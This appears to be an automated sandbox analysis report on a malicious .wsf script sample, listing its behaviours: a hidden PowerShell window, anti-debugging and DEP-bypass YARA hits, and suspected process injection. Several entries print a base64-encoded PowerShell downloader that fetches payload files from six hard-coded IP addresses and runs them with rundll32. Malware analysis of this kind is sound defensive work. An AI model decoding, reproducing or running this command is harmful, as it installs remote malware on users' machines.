gB2ADoAVABFAE0AUABcAEMAaABhAG4AYwBlAGwAbwByAC4AYwBoAG8AbABlAGMAeQBzAHQAbwBsAGkAdABoAGkAYQBzAGkAcwA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEMAaABhAG4AYwBlAGwAbwByAC4AYwBoAG8AbABlAGMAeQBzAHQAbwBsAGkAdABoAGkAYQBzAGkAcwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABDAGgAYQBuAGMAZQBsAG8AcgAuAGMAaABvAGwAZQBjAHkAcwB0AG8AbABpAHQAaABpAGEAcwBpAHMALABOAGkAawBuADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA="

cmdline

powershell -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQAcwBvAGYAdABpAHMAaABIAG8AbABvAHMAdABvAG0AYQB0AGUAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8ANQAuADQAMgAuADIAMgAxAC4AMQAyADQALwBiAEMAcABnAEMALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4ANgA2AC4AMgA0ADgALgAxADgANwAvAEQASAA2AEQAUQBxAG0AdABxAGIAagBpAC4AZABhAHQALABoAHQAdABwADoALwAvADEANAA5AC4AMQAwADIALgAyADQAMwAuADIAMAA0AC8AaQB5AGEATgBlAGIAUAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA1ADEALgAyADIAMgAuADEAOQA5AC4AMgA0ADQALwA1ADAAagBRADcASQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA0ADUALgAxADUAOQAuADIANAA5AC4AMwAzAC8ATQBYADEAUgA1AHQASQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA4ADcALgAyADMANgAuADEANAA2AC4AMwA0AC8AeABoAEgAZQBXAG8ATAAuAGQAYQB0ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAG8AdQB0AHAAaQBjAGsAZQB0ACAAaQBuACAAJABzAG8AZgB0AGkAcwBoAEgAbwBsAG8AcwB0AG8AbQBhAHQAZQApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAbwB1AHQAcABpAGMAawBlAHQAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADcAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAEMAaABhAG4AYwBlAGwAbwByAC4AYwBoAG8AbABlAGMAeQBzAHQAbwBsAGkAdABoAGkAYQBzAGkAcwA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEMAaABhAG4AYwBlAGwAbwByAC4AYwBoAG8AbABlAGMAeQBzAHQAbwBsAGkAdABoAGkAYQBzAGkAcwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABDAGgAYQBuAGMAZQBsAG8AcgAuAGMAaABvAGwAZQBjAHkAcwB0AG8AbABpAHQAaABpAGEAcwBpAHMALABOAGkAawBuADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA="

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW April 12, 2023, 1:36 p.m.	show_type: 0 filepath_r: powershell parameters: -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQAcwBvAGYAdABpAHMAaABIAG8AbABvAHMAdABvAG0AYQB0AGUAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8ANQAuADQAMgAuADIAMgAxAC4AMQAyADQALwBiAEMAcABnAEMALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4ANgA2AC4AMgA0ADgALgAxADgANwAvAEQASAA2AEQAUQBxAG0AdABxAGIAagBpAC4AZABhAHQALABoAHQAdABwADoALwAvADEANAA5AC4AMQAwADIALgAyADQAMwAuADIAMAA0AC8AaQB5AGEATgBlAGIAUAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA1ADEALgAyADIAMgAuADEAOQA5AC4AMgA0ADQALwA1ADAAagBRADcASQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA0ADUALgAxADUAOQAuADIANAA5AC4AMwAzAC8ATQBYADEAUgA1AHQASQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA4ADcALgAyADMANgAuADEANAA2AC4AMwA0AC8AeABoAEgAZQBXAG8ATAAuAGQAYQB0ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAG8AdQB0AHAAaQBjAGsAZQB0ACAAaQBuACAAJABzAG8AZgB0AGkAcwBoAEgAbwBsAG8AcwB0AG8AbQBhAHQAZQApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAbwB1AHQAcABpAGMAawBlAHQAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADcAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAEMAaABhAG4AYwBlAGwAbwByAC4AYwBoAG8AbABlAGMAeQBzAHQAbwBsAGkAdABoAGkAYQBzAGkAcwA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEMAaABhAG4AYwBlAGwAbwByAC4AYwBoAG8AbABlAGMAeQBzAHQAbwBsAGkAdABoAGkAYQBzAGkAcwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABDAGgAYQBuAGMAZQBsAG8AcgAuAGMAaABvAGwAZQBjAHkAcwB0AG8AbABpAHQAaABpAGEAcwBpAHMALABOAGkAawBuADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA=" filepath: powershell	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 12, 2023, 1:36 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQAcwBvAGYAdABpAHMAaABIAG8AbABvAHMAdABvAG0AYQB0AGUAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8ANQAuADQAMgAuADIAMgAxAC4AMQAyADQALwBiAEMAcABnAEMALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4ANgA2AC4AMgA0ADgALgAxADgANwAvAEQASAA2AEQAUQBxAG0AdABxAGIAagBpAC4AZABhAHQALABoAHQAdABwADoALwAvADEANAA5AC4AMQAwADIALgAyADQAMwAuADIAMAA0AC8AaQB5AGEATgBlAGIAUAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA1ADEALgAyADIAMgAuADEAOQA5AC4AMgA0ADQALwA1ADAAagBRADcASQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA0ADUALgAxADUAOQAuADIANAA5AC4AMwAzAC8ATQBYADEAUgA1AHQASQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA4ADcALgAyADMANgAuADEANAA2AC4AMwA0AC8AeABoAEgAZQBXAG8ATAAuAGQAYQB0ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAG8AdQB0AHAAaQBjAGsAZQB0ACAAaQBuACAAJABzAG8AZgB0AGkAcwBoAEgAbwBsAG8AcwB0AG8AbQBhAHQAZQApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAbwB1AHQAcABpAGMAawBlAHQAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADcAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAEMAaABhAG4AYwBlAGwAbwByAC4AYwBoAG8AbABlAGMAeQBzAHQAbwBsAGkAdABoAGkAYQBzAGkAcwA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEMAaABhAG4AYwBlAGwAbwByAC4AYwBoAG8AbABlAGMAeQBzAHQAbwBsAGkAdABoAGkAYQBzAGkAcwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABDAGgAYQBuAGMAZQBsAG8AcgAuAGMAaABvAGwAZQBjAHkAcwB0AG8AbABpAHQAaABpAGEAcwBpAHMALABOAGkAawBuADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA="
parent_process	wscript.exe				martian_process	powershell -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQAcwBvAGYAdABpAHMAaABIAG8AbABvAHMAdABvAG0AYQB0AGUAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8ANQAuADQAMgAuADIAMgAxAC4AMQAyADQALwBiAEMAcABnAEMALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4ANgA2AC4AMgA0ADgALgAxADgANwAvAEQASAA2AEQAUQBxAG0AdABxAGIAagBpAC4AZABhAHQALABoAHQAdABwADoALwAvADEANAA5AC4AMQAwADIALgAyADQAMwAuADIAMAA0AC8AaQB5AGEATgBlAGIAUAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA1ADEALgAyADIAMgAuADEAOQA5AC4AMgA0ADQALwA1ADAAagBRADcASQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA0ADUALgAxADUAOQAuADIANAA5AC4AMwAzAC8ATQBYADEAUgA1AHQASQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA4ADcALgAyADMANgAuADEANAA2AC4AMwA0AC8AeABoAEgAZQBXAG8ATAAuAGQAYQB0ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAG8AdQB0AHAAaQBjAGsAZQB0ACAAaQBuACAAJABzAG8AZgB0AGkAcwBoAEgAbwBsAG8AcwB0AG8AbQBhAHQAZQApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAbwB1AHQAcABpAGMAawBlAHQAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADcAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAEMAaABhAG4AYwBlAGwAbwByAC4AYwBoAG8AbABlAGMAeQBzAHQAbwBsAGkAdABoAGkAYQBzAGkAcwA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEMAaABhAG4AYwBlAGwAbwByAC4AYwBoAG8AbABlAGMAeQBzAHQAbwBsAGkAdABoAGkAYQBzAGkAcwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABDAGgAYQBuAGMAZQBsAG8AcgAuAGMAaABvAGwAZQBjAHkAcwB0AG8AbABpAHQAaABpAGEAcwBpAHMALABOAGkAawBuADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA="

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2060 resumed a thread in remote process 2184
NtResumeThread April 12, 2023, 1:36 p.m.	thread_handle: 0x0000012c suspend_count: 1 process_identifier: 2184	1	0	0

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

xI-Febuary.12(69).wsf

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All